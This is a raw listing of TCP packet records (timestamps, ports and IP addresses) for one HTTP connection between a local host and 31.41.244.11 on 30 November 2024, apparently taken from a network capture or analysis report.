Nov 30, 2024 04:06:11.573151112 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.573194027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.574022055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.574068069 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.632029057 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.632097960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.632153988 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.632201910 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.632379055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.632426977 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.632483006 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.632530928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.633330107 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.633384943 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.633506060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.633549929 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.634263992 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.634318113 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.634392023 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.634443045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.635214090 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.635272026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.635287046 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.635315895 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.636156082 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.636203051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.636265993 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.636317968 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.637090921 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.637140989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.637176991 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.637223005 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.638020992 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.638077974 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.638113022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.638163090 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.638950109 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.638995886 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.639062881 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.639116049 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.639894962 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.639954090 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.639992952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.640038967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.640857935 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.640913963 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.640944958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.640990973 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.641767025 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.641820908 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.641868114 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.641913891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.642713070 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.642751932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.642812967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.642889977 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.643656015 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.643702984 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.643755913 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.643810987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.644594908 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.644642115 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.644714117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.644758940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.645529985 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.645605087 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.645641088 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.645685911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.646461964 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.646517038 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.646630049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.646681070 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.647408962 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.647469044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.647505999 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.647553921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.648353100 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.648401976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.648471117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.648519993 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.649300098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.649354935 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.649389982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.649435043 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.650208950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.650293112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.650322914 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.650362015 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.651185989 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.651230097 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.651266098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.651305914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.652113914 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.652199984 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.652215958 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.652265072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.653060913 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.653107882 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.653146029 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.653193951 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.653990984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.654038906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.654051065 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.654098988 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.654952049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.655004025 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.655040026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.655086040 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.655848026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.655896902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.655966043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.656011105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.656801939 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.656850100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.656913996 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.656970024 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.657747984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.657800913 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.657838106 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.657886982 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.658685923 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.658745050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.658791065 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.658837080 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.659617901 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.659672022 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.659713984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.659759045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.660590887 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.660646915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.660681963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.660732031 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.661518097 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.661571980 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.661628008 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.661694050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.662471056 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.662523031 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.662591934 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.662636995 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.663368940 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.663417101 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.663461924 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.663506985 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.664314032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.664361000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.664447069 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.664495945 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.665263891 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.665319920 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.665363073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.665410995 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.666181087 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.666243076 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.666276932 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.666325092 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.667149067 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.667201042 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.667257071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.667303085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.668070078 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.668122053 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.668174982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.668227911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.669008017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.669056892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.669090986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.669130087 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.669961929 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.670016050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.670073986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.670154095 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.670962095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.671016932 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.671031952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.671078920 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.671857119 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.671916962 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.671952009 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.672007084 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.672785044 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.672836065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.672890902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.672935963 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.673722982 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.673770905 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.673840046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.673882008 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.674654007 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.674698114 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.674763918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.674806118 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.675578117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.675630093 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.675654888 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.675707102 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.676518917 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.676568031 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.676618099 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.676666975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.677455902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.677514076 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.677548885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.677596092 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.763678074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.763776064 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.763917923 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.764163971 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.764214993 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.764266014 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.764311075 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.765099049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.765146971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.765203953 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.765245914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.765984058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.766028881 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.824052095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.824064970 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.824373960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.824382067 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.824496984 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.824498892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.824582100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.825330019 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.825381041 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.825404882 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.825444937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.826262951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.826308966 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.826457024 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.826499939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.827219963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.827270031 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.827392101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.827436924 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.828191042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.828237057 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.828305006 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.828347921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.829140902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.829185963 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.829256058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.829297066 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.830039978 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.830086946 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.830128908 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.830173016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.830971003 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.831017971 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.831077099 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.831119061 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.831918001 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.831964016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.832040071 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.832082987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.832847118 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.832896948 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.832954884 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.833022118 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.833790064 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.833837986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.833878040 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.833920002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.834713936 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.834760904 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.834837914 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.834881067 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.835666895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.835711956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.835812092 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.835856915 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.836602926 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.836647987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.836702108 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.836745024 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.837543011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.837588072 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.837651968 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.837702990 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.838476896 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.838525057 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.838587046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.838629961 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.839420080 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.839473009 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.839529037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.839571953 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.840388060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.840431929 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.840502024 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.840548992 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.841321945 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.841368914 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.841433048 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.841476917 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.842231035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.842278004 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.842350960 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.842392921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.843167067 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.843214989 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.843264103 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.843307972 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.844129086 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.844176054 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.844249964 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.844294071 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.845057964 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.845112085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.845163107 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.845206022 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.845978022 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.846029997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.846091986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.846134901 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.846911907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.846957922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.847012997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.847055912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.847858906 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.847902060 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.847963095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.848002911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.848822117 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.848864079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.848918915 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.848963976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.849766970 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.849811077 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.849869967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.849912882 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.850676060 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.850739956 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.850785017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.850821972 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.851633072 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.851677895 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.851697922 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.851741076 CET	49765	80	192.168.2.4	31.41.244.11
